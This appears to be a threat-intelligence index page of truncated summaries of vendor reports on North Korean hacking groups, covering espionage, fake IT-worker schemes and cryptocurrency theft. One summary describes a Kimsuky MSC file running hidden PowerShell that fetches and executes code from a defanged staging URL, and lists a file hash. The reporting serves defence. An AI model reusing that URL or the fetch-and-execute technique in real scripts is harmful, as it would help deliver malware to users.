654 reports
CYFIRMA profiles Kimsuky as a North Korean hacking group active since at least 2018 and engaged in espionage and financially motivated cybercrime aligned with North Korean state interests. The profile lists target exposure across South Korea, the United S…
Microsoft Threat Intelligence discussed two North Korea-linked clusters, Onyx Sleet and Storm-0530, with emphasis on how DPRK cyber activity mixes espionage, theft, and moonlighting-style operations. The notes describe Onyx Sleet as a long-running actor t…
Indodax lost roughly $25.22 million on September 10 after attackers initiated withdrawals across Ethereum, Polygon, Tron, Bitcoin, and other chains. Cyvers reported suspicious transactions from exchange wallets, while SlowMist assessed that the activity d…
Security Blue Team uses the KnowBe4 fake IT-worker incident to explain how North Korean operators can combine stolen identities, AI-enhanced profile images and remote hiring workflows to gain insider access. The excerpt says the impostor passed hiring che…
A Kimsuky sample named Terms and conditions.msc embeds PowerShell commands that run hidden from the user and retrieve additional content from hxxps://0x0(.)st/Xyl7(.)txt. The script uses Invoke-Expression and Invoke-WebRequest, decodes hexadecimal data in…
The Korean analysis attributes a malicious file named Terms and conditions.msc to Kimsuky and provides hashes for the MSC sample, including SHA-256 cea22277e0d7fe38a3755bdb8baa9fe203bd54ad4d79c7068116f15a50711b09. The MSC content launches PowerShell in a …
ReversingLabs links new malicious Python packages to VMConnect, a campaign previously associated with North Korea's Lazarus Group through Japan CERT research and code similarities. The activity targets developers through fake recruiter and coding-test lur…
Unit 42 maps North Korean cyber activity to RGB-linked clusters rather than treating all public reporting as a single Lazarus label. The assessment separates Alluring Pisces, Gleaming Pisces, Jumpy Pisces, Selective Pisces, Slow Pisces, and Sparkling Pisc…
AhnLab reports a Kimsuky APT campaign targeting domestic users with decoy Word documents themed around Russia and North Korea relations. The attacker used a GitHub repository to host multiple malicious scripts and benign decoy files, with the scripts ulti…
The report analyzes a Kimsuky malware sample that the author assesses may be related to Korea University targeting. The source provides SHA-1 and SHA-256 hashes and shows heavily obfuscated command content associated with the sample. Because the available…
Genians links increased Konni campaign activity with high confidence to the Kimsuky cluster and describes continued use of spear phishing against South Korean, Russian, diplomatic, security, finance, and cryptocurrency-related targets. The activity uses s…
Mandiant describes DPRK-linked Web3 heists in which North Korean threat actors use both social engineering and supply-chain access to compromise cryptocurrency organizations and drain wallet funds. Recent cases included fake LinkedIn recruiting and coding…
Group-IB tracks Lazarus activity in the Contagious Interview campaign, where developers and blockchain professionals are approached through job platforms and moved to Telegram before being asked to run fake interview tasks or conferencing software. The in…
SentinelOne describes North Korean IT workers using fraudulent employment to enter U.S. companies, earn revenue for the DPRK, and create security exposure inside corporate networks. The report cites the August 2024 Justice Department case against Matthew …
Mandiant frames DPRK activity as a central driver of high-value Web3 theft, citing the Ronin bridge heist of more than $600 million and earlier APT38 bank-heist experience. Recent exchange intrusions used fake recruiting over LinkedIn to deliver COVERTCAT…